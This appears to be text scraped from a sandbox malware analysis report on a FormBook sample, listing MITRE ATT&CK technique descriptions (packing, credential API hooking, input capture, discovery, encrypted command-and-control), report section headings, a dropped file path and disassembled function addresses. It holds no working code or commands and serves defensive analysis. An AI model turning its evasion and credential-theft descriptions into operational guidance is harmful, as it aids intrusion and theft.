Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7pECKdsaig.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
7pECKdsaig.exe

Function 00A8ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00A9A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 00A9A3FB Relevance: 1.5, APIs: 1, Instructions: 38
filenativeCOMMON

Function 00A9A400 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 00A9A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00A9A47A Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 00A9A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 00A89AA0 Relevance: .1, Instructions: 92
COMMON

Function 00A88310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 00A8ACD4 Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMON

Function 00A9A620 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON